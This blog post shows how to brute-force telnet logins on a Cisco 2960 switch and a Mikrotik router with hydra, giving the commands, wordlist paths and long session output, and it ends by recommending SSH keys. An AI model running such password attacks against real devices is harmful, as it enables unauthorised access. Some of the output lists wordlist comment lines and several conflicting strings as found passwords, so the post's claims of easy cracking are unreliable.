How to crack the cisco telnet password on a Cisco 2960 switch.

Cracking the Cisco telnet password on a Cisco 2960 switch is very easy when you are using the hydra password cracking tool. I used this command to crack the telnet login.


hydra -P password.lst 10.42.0.87 cisco

This is the password cracking session that resulted in me cracking the telnet login.

[email protected]:~# hydra -P password.lst 10.42.0.87 cisco
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:28:39
[WARNING] you should set the number of parallel task to 4 for cisco services.
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service cisco on port 23
[23][cisco] host: 10.42.0.87   password: password

Here is another example, this is a telnet password set on a Mikrotik Cloud Switch Router.

[email protected]:~# hydra -l cisco -P password.lst 172.18.31.162 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:42:06
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service telnet on port 23
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment:
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: This list is based on passwords most commonly seen on a set of Unix
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: systems in mid-1990's, sorted for decreasing number of occurrences
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: (that is, more common passwords are listed first).  It has been
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: revised to also include common website passwords from public lists
[ERROR] Child with pid 8260 terminating, can not connect
[ERROR] Child with pid 8262 terminating, can not connect
[ERROR] Child with pid 8263 terminating, can not connect
[ERROR] Child with pid 8264 terminating, can not connect
[ERROR] Child with pid 8268 terminating, can not connect
[ERROR] Child with pid 8266 terminating, can not connect
[ERROR] Child with pid 8267 terminating, can not connect
[ERROR] Child with pid 8269 terminating, can not connect
[23][telnet] host: 172.18.31.162   login: cisco   password: password1
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: in 1996 through 2011.  It is assumed to be in the public domain.
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: This list has been compiled by Solar Designer of Openwall Project
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This is also easily cracked.

I am using the wordlist from /usr/share/john/password.lst, but there are wordlists in /usr/share/wordlists.

Here is another example,

[email protected]:~# hydra -l cisco -P password.lst 172.18.31.162 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:49:13
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service telnet on port 23
[ERROR] Child with pid 14712 terminating, can not connect
[ERROR] Child with pid 14715 terminating, can not connect
[ERROR] Child with pid 14714 terminating, can not connect
[ERROR] Child with pid 14713 terminating, can not connect
[ERROR] Child with pid 14719 terminating, can not connect
[ERROR] Child with pid 14717 terminating, can not connect
[ERROR] Child with pid 14716 terminating, can not connect
[ERROR] Child with pid 14720 terminating, can not connect
[ERROR] Child with pid 14718 terminating, can not connect
[ERROR] Child with pid 14721 terminating, can not connect
[ERROR] Child with pid 15070 terminating, can not connect
[23][telnet] host: 172.18.31.162   login: cisco   password: spring
[23][telnet] host: 172.18.31.162   login: cisco   password: steven
[ERROR] Child with pid 15071 terminating, can not connect
[ERROR] Child with pid 15074 terminating, can not connect
[ERROR] Child with pid 15073 terminating, can not connect
[ERROR] Child with pid 15076 terminating, can not connect
[ERROR] Child with pid 15078 terminating, can not connect
[ERROR] Child with pid 15079 terminating, can not connect
[ERROR] Child with pid 15080 terminating, can not connect
[ERROR] Child with pid 15081 terminating, can not connect
[ERROR] Child with pid 15083 terminating, can not connect
[ERROR] Child with pid 15084 terminating, can not connect
[ERROR] Child with pid 15085 terminating, can not connect
[ERROR] Child with pid 15087 terminating, can not connect
[ERROR] Child with pid 15088 terminating, can not connect
[STATUS] 3559.00 tries/min, 3559 tries in 00:01h, 1 todo in 00:01h, 16 active
[23][telnet] host: 172.18.31.162   login: cisco   password: beavis
[STATUS] 1779.50 tries/min, 3559 tries in 00:02h, 1 todo in 00:01h, 16 active
[STATUS] 1186.33 tries/min, 3559 tries in 00:03h, 1 todo in 00:01h, 16 active
[STATUS] 889.75 tries/min, 3559 tries in 00:04h, 1 todo in 00:01h, 16 active
[STATUS] 711.80 tries/min, 3559 tries in 00:05h, 1 todo in 00:01h, 16 active
[STATUS] 593.17 tries/min, 3559 tries in 00:06h, 1 todo in 00:01h, 16 active
[STATUS] 508.43 tries/min, 3559 tries in 00:07h, 1 todo in 00:01h, 16 active
[STATUS] 444.88 tries/min, 3559 tries in 00:08h, 1 todo in 00:01h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This goes to show the telnet protocol is very insecure at the best of times especially when you are using a weak password. That is why it is better to use SSH on a Cisco switch or router and SSH keys instead of passwords.

No comments have been made. Use this form to start the conversation :)

Leave a Reply